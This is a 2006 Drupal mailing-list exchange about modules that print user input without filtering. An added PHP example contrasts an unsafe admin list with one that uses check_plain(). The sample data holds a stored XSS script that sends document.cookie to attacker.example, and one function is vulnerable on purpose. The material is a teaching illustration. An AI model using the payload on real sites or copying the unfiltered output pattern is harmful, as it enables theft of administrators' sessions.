On 12 May 2006, at 9:37 AM, Bèr Kessels wrote:
I was not referring to the filtering system itself. The part that filters nodes and comments works pretty well IMO. I was referring to things like where a module collects Foo (outside the node/comment system) as input and e.g. prints them in a list. If that module developer forgets to call the proper filters for the Foos, we have a security hole. The Views module, e.g., does this very well, but imagine a module like that with all the input not sanitized. Yes, those places are only accessible by admins. But no: having something in the admin area is not a reason for not sanitizing HTML.
Yup, then I believe the 'model' part of fapi 2.0 is the best place to do it. We can't even start working on that until the menu / callback system is refactored/fixed. I'll write up a spec about what I'd like to see happen to the menu system.

--
Adrian Rossouw
Drupal developer and Bryght Guy
http://drupal.org | http://bryght.com
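The hole Bèr describes, shown as an added example that is not code from this thread or from any Drupal module: a contributed module collects "Foo" strings and prints them in an admin-only list. The function names foo_admin_list_unsafe() and foo_admin_list_safe() are hypothetical, the $foos array is constructed sample data standing in for rows the module stored, and the check_plain() shim only exists so the script runs outside Drupal (in Drupal 4.7 the real check_plain() is htmlspecialchars($text, ENT_QUOTES)).

```php
<?php
// Added example, not part of the original thread or of any Drupal module.
// Simulates a contributed module that collects user-supplied "Foo" strings
// and prints them in an admin-only page, once unfiltered and once filtered.

// Constructed sample data: stands in for rows read from a module-owned table.
// The second entry is what a low-privilege user could have saved through a
// form whose values were never filtered on input.
$foos = array(
  'Plain label',
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
  'Ampersands & <b>tags</b>',
);

// Stand-in for Drupal 4.7's check_plain() so this script is self-contained.
// Inside Drupal the core function is used instead (function_exists() guard).
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES);
  }
}

// VULNERABLE (hypothetical helper): the pattern from the thread. The page is
// admin-only, but each stored Foo is echoed back verbatim, so the admin who
// views the list runs whatever markup the attacker stored.
function foo_admin_list_unsafe(array $foos) {
  $items = array();
  foreach ($foos as $foo) {
    $items[] = '<li>' . $foo . '</li>';
  }
  return '<ul>' . implode('', $items) . '</ul>';
}

// HARDENED (hypothetical helper): identical structure, but every Foo goes
// through check_plain() at output time. "Admin-only" does not change this.
function foo_admin_list_safe(array $foos) {
  $items = array();
  foreach ($foos as $foo) {
    $items[] = '<li>' . check_plain($foo) . '</li>';
  }
  return '<ul>' . implode('', $items) . '</ul>';
}

echo "Unsafe:\n" . foo_admin_list_unsafe($foos) . "\n\n";
echo "Safe:\n" . foo_admin_list_safe($foos) . "\n";
```

Run with `php` from the command line and compare the two blocks: the unsafe list contains a live `<script>` element, the safe one renders it as visible text. In real module code the `$items` array would normally be handed to `theme('item_list', $items)`, but that theme function expects items that are already safe HTML, so the check_plain() call stays the module developer's responsibility either way, which is exactly the point Bèr is making.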